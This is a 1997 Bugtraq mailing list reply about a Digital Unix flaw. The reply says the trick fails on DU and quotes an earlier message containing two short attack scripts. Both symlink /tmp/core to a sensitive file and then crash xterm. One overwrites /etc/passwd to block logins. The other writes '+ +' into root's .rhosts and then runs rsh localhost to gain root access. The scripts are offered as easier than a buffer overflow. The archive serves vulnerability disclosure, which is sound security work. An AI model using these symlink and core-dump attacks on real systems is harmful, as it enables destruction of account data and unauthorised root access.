Bugtraq mailing list archives
Re: Digital Unix Security Problem
From: tom () SBA MIAMI EDU (Tom Leffingwell)
Date: Thu, 13 Nov 1997 18:22:58 -0500
DU doesn't allow +'s in /.rhosts, at least under C2, and I think so in general. It doesn't seem to work even if you specify a user, either. On Thu, 13 Nov 1997, Andrew Brown wrote:
Even with a buffer overflow, I've never seen anyone exploit on one DU. If anyone has done so sucessfully, plese email me. Despite that, a person with basic knowledge of unix could easily do something like: #/!bin/csh cd /tmp ln -s /etc/passwd /tmp/core setenv DISPLAY abcdefghi /usr/bin/X11/xterm The contents of /etc/passwd becomes xterm's core, preventing further logins. Obviously you could do things without an immediate impact such as ln -s /vmunix /tmp/core.or...if the system you're on is actually running r-services, you could do #!/bin/sh DISPLAY=" + + " export DISPLAY cd /tmp ln -s /.rhosts /tmp/core /usr/bin/X11/xterm rsh localhost which sets the DISPLAY variable to an "admit all from all" line and the core dump will go into root's .rhosts file. then all that remains is the rsh localhost and you're all set! considerably easier than a buffer overflow exploit... -- |-----< "CODE WARRIOR" >-----| andrew () echonyc com (TheMan) * "ah! i see you have the internet codewarrior () daemon org that goes *ping*!" warfare () graffiti com * "information is power -- share the wealth."
Current thread:
- Digital Unix Security Problem Tom Leffingwell (Nov 12)
- Re: Digital Unix Security Problem Andrew Brown (Nov 13)
- Re: Digital Unix Security Problem Tom Leffingwell (Nov 13)
- (LOWNOISE) Another Digital Unix Security Problem0 Efrain Torres Mejia (Nov 18)
- Re: Digital Unix Security Problem Andrew Brown (Nov 13)